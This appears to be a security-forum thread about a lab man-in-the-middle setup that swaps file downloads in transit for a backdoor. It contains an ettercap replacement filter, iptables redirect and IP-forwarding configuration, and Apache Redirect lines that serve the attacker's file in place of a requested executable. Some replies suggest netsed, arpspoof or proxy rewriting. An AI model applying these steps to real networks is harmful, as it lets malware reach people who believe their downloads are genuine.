Results 1 to 8 of 8

Thread: MITM attacks... replacing file downloads with your backdoor

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default MITM attacks... replacing file downloads with your backdoor

    lab setup, smb server running on 192.168.1.2... backtrack4 downloads file.exe from the server, this file contains nothing but 71 witch equals x i would like to swap the data on the fly with the use of a filter...
    Code:
    file.exe contains
    71717171717171717171717171...etc...
    the filter should sort threw traffic on port 135 and once xxx is found it should be replaced with qqq
    Code:
    if (ip.proto == TCP && tcp.src == 135) {
          if (search(DATA.data, "xxx")) {
               replace("xxx", "qqq" />");
               msg("bytes replaced");
          }}
    i have made all kinds of attempts... i could make a video showing my attempts...

    i have transferred the file and dumped the traffic with wireshark for a template or data control...

    please give your ideas and thoughts...

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    I'd be more interested in knowing what is failing or not. What is tcpdump showing during file transfer (i.e. can you manually see the "xxx" data), can you replicate with two netcat instances doing a file transfer on the same port, etc.

    Most of that is geared towards ensuring your filtering is in place and operational.

    Then you should be looking to see if there is any need to decode what you are seeing within ettercap, and that's about as much troubleshooting as I can provide.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    Im going to try out another lab setup witch i think makes more sence... ill focus on file transfers from firefox and httpd-apache server, this server will be hosting a file called block.exe witch is 84 bytes in size and only contains the hex value of 58 witch is nothing but X's...

    here is a packet i captured... in plain text
    HTTP HTTP/1.1 200 OK (application/x-msdos-program)
    Code:
    HTTP/1.1 200 OK
    Date: Mon, 31 Aug 2009 22:45:42 GMT
    Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
    Last-Modified: Mon, 31 Aug 2009 04:46:34 GMT
    ETag: "411bd-54-47268b7e13e80"
    Accept-Ranges: bytes
    Content-Length: 84
    Keep-Alive: timeout=15, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdos-program
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    and here is the same packet but in binary print
    Code:
    0000   00 1a 73 91 01 9c 00 1e 2a 51 10 8e 08 00 45 00  ..s.....*Q....E.
    0010   01 dc 93 4a 40 00 3f 06 d6 54 47 c5 c7 0b c0 a8  ...J@.?..TG.....
    0020   01 04 00 50 da fa dd ba 08 cc de 0c 5a 8a 80 18  ...P........Z...
    0030   00 6c 0b 16 00 00 01 01 08 0a 00 1e 9b 86 00 1e  .l..............
    0040   9b 84 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f  ..HTTP/1.1 200 O
    0050   4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 33 31  K..Date: Mon, 31
    0060   20 41 75 67 20 32 30 30 39 20 32 32 3a 34 35 3a   Aug 2009 22:45:
    0070   34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20  42 GMT..Server: 
    0080   41 70 61 63 68 65 2f 32 2e 32 2e 39 20 28 55 62  Apache/2.2.9 (Ub
    0090   75 6e 74 75 29 20 50 48 50 2f 35 2e 32 2e 36 2d  untu) PHP/5.2.6-
    00a0   62 74 30 20 77 69 74 68 20 53 75 68 6f 73 69 6e  bt0 with Suhosin
    00b0   2d 50 61 74 63 68 0d 0a 4c 61 73 74 2d 4d 6f 64  -Patch..Last-Mod
    00c0   69 66 69 65 64 3a 20 4d 6f 6e 2c 20 33 31 20 41  ified: Mon, 31 A
    00d0   75 67 20 32 30 30 39 20 30 34 3a 34 36 3a 33 34  ug 2009 04:46:34
    00e0   20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 34 31 31   GMT..ETag: "411
    00f0   62 64 2d 35 34 2d 34 37 32 36 38 62 37 65 31 33  bd-54-47268b7e13
    0100   65 38 30 22 0d 0a 41 63 63 65 70 74 2d 52 61 6e  e80"..Accept-Ran
    0110   67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74  ges: bytes..Cont
    0120   65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 34 0d 0a  ent-Length: 84..
    0130   4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65  Keep-Alive: time
    0140   6f 75 74 3d 31 35 2c 20 6d 61 78 3d 31 30 30 0d  out=15, max=100.
    0150   0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65  .Connection: Kee
    0160   70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74  p-Alive..Content
    0170   2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69  -Type: applicati
    0180   6f 6e 2f 78 2d 6d 73 64 6f 73 2d 70 72 6f 67 72  on/x-msdos-progr
    0190   61 6d 0d 0a 0d 0a 58 58 58 58 58 58 58 58 58 58  am....XXXXXXXXXX
    01a0   58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    01b0   58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    01c0   58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    01d0   58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    01e0   58 58 58 58 58 58 58 58 58 58                    XXXXXXXXXX
    Content-Type: application/x-msdos-program
    Content-Length: 84

    these 2 lines look vary interesting to me...
    content length = X, you now know that the last X bytes of the packet is the data that needs to be altered...

    so, if these 2 strings are found then the swap needs to take place...

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Check out the IronGeek's page on ettercap filters, it focuses quite well on HTTP manipulation.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    @bigmac
    You could try this, it seems to work. Add these lines in your apache conf
    Redirect /files/somefile/ http://192.168.1.1/files/somefile/
    Redirect / http://somewebsite.com

    If the link to download a file is "somewebsite.com/files/somefile/3456.exe " it will grab the file of your server(rename it on your sever to 3456.exe), otherwise it will goto the web site they are allready viewing.

  6. #6
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    Right now, i just want to shoot my brains out, i just realized that all the testing i have done so far have been false because ettercap DOEST EVEN WORK

    i guess ettercap needs configuring these days

    echo 1 > /proc/sys/net/ipv4/ip_forward
    edit this file /etc/etter.conf
    Code:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    ettercap still is not working properly... the filter irongeek provides does not work ( i have used in the past and worked just fine) the data is not being replaced... i have a collection of old filters i wrote that dont work... whats the deal...

  7. #7
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    Right now, i just want to shoot my brains out, i just realized that all the testing i have done so far have been false because ettercap DOEST EVEN WORK

    i guess ettercap needs configuring these days

    echo 1 > /proc/sys/net/ipv4/ip_forward
    edit this file /etc/etter.conf

    Code:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"ettercap still is not working properly... the filter irongeek provides does not work ( i have used in the past and worked just fine) the data is not being replaced... i have a collection of old filters i wrote that dont work... whats the deal...
    Just use the apache rediect commands, works evertime.
    I couldn't get ettercap to work anymore, use netsed,arpspoof and wireshark

  8. #8
    Junior Member IAMZOMBIE's Avatar
    Join Date
    Jan 2010
    Posts
    81

    Default

    My first thought was ngrep, but I'm not sure if it can do a replace. You might be able to rewrite the source. Might be a good start.

    Or maybe have a proxy server in-between your webserver and the internet and have all packets going out written to a temp file and then grep/replace and send back out every 5 seconds. It would create a large delay for the victim, but might work.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •